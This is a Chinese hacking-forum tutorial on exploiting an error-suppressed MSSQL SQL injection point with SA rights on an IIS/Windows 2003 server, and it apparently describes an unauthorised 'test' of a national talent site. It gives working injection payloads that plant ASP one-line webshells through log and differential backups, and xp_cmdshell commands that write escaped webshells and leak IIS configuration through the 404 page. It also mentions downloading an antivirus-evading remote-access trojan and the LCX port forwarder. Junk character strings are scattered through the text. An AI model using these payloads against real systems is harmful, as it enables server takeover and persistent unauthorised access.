sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

- C# ?; p3 S7 a7 J
2 y0 N- @4 p2 J0 k0 [5 @                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
' b2 m, X4 f& S, c4 A                                                                 
                                                                  论坛： http://www.90team.net/



5 d8 n$ ?/ ]8 x8 C/ ?0 `友情检测国家人才网

" t3 H  @& X1 t2 R; @/ X1 U! S1 {8 L
: m( e- t; A, p* _% ^) E内容：MSSQL注入SA权限不显错模式下的入侵

- y$ M! v, M% ?1 o
. L' p2 F# o/ `+ M2 \! C一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
/ m/ a6 O1 M- ?9 b) x% U
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

$ R4 J5 s9 q  L
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
$ i, c% h$ ?' g# h
思路：

* W  |6 U' G$ X. b# T( D9 w3 _首先：

; Q2 U7 Z  a- z* b  x, W通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell
, @3 V+ T% L- E4 S# I
2.数据库差异备份获得Webshell
8 X, X2 |% V; S/ I" S5 S8 g
5 x4 N; v1 {7 F, Y% J+ P4.直接下载免杀远控木马。

+ t. T( l/ x: U, I: ]5.直接下载LCX将服务器端口转发出来

9 K! L! R, l9 s6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
3 i/ H" Z7 J, \& B6 T. p
2 F  s+ J9 b6 z& W: q, @: p5 S

在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
: z, ?; l/ u# H3 m; e! z
我直接演示后面一个方法
+ }* ], ~5 |( X1 `: M( H
* W' L8 X* Z( b, q8 J! k7 N: ?
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL


& v! d3 M- `' t' ~* r$ u

◆日志备份：


1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
) {' l7 |; L, ^8 j6 B3 \' k/ O0 r
, I' K. J, Q% |6 y( n2. 插入数据
& V. u( v1 B3 `5 x3 w% f;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 s. A* ~# m. l) ]- v
: F3 v& v8 h. t% F4 o" m8 s0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 k# y9 z6 f, s2 |  
9 W  v1 a8 ?. o3. 备份并获得文件，删除临时表
; T' z2 u4 a+ H- E;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--


4 R( U1 [( p+ Y8 U, y
◆数据库差异备份

1 Y0 U# _6 r* A1 ?: ?（1. 进行差异备份准备工作
/ A* x( ^- l0 m/ y( J
7 X1 b6 [% n6 m: A* u1 [6 f9 k+ g;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

  c; w! d1 B% u, i上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
& e4 u# y8 O9 d9 i+ `

（2. 将数据写入到数据库
; i3 \; m; z/ \- i;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
' s: F9 E5 [) h6 t  X% U7 S* v
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  Z+ |: u5 u3 F; p+ B6 S
+ p7 n7 ?# k' ]& U& V3. 备份数据库并清理临时文件

8 R4 c* Z& P5 [. t9 \% T6 ~;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
' O7 x1 a! h) }% m! j6 f7 w
$ t4 f! [% f; K  b2 ^0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
" d2 i; |. k8 U


用^转义字符来写ASP(一句话木马)文件的方法:   
/ a6 J2 ^( z, z' n& Y
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
& f1 l8 u4 n! g( F1 J* X
读取IIS配置信息获取web路径

- Y) ]/ i( ]5 Y/ L     
/ e. P# q' ?6 V5 E# H/ s     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
4 @" z9 Y9 z; V& K+ j# B  k2 T  S1 M# g     
5 t2 V9 X$ i- h     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
5 V7 F9 |+ a9 u


5 H- |1 H; d" ^3 q
+ C9 u( R7 m* H7 n* b

6 M8 O9 _& |( R7 b) {9 p
8 O+ z; I* l& x' E" I6 y* L
2 f+ P) W3 e- f. Q( j0 a# ^% W



; D% C6 X) c, {* o2 y! f
, n3 i/ f2 l$ w/ J3 B7 H  \
/ a0 s4 |9 Q, U9 q  D) R" |4 ?



! F1 _: h+ K( O3 W
6 f. _( S7 x4 G8 }4 b



! j, x; D! _* O" a+ R

3 g+ Z. _3 ]0 v( u3 Q" }& I
& y; u, a2 z" V7 U' h
, m. }8 p/ L4 q8 u- k
4 `, j2 j& Q0 K
0 t3 N' a" t) k8 _


  z  o8 x- s6 ?/ H  r# @" U# p

) ]6 x1 }2 ^! U5 i, E1 ~

3 i% f/ |$ `* a! I! a% P1 m
0 H8 \1 D& A( e4 H' d3 T
: u* q+ Q- c" I9 x

. `% a* x* ?5 J; b. r
/ q7 h) n8 J5 k) F0 ?

1 `: u6 e: I4 N+ O/ G2 {


+ j0 J) |2 R/ N" I7 I! Y) \1 I6 v
$ A9 |& h4 N! g3 I: D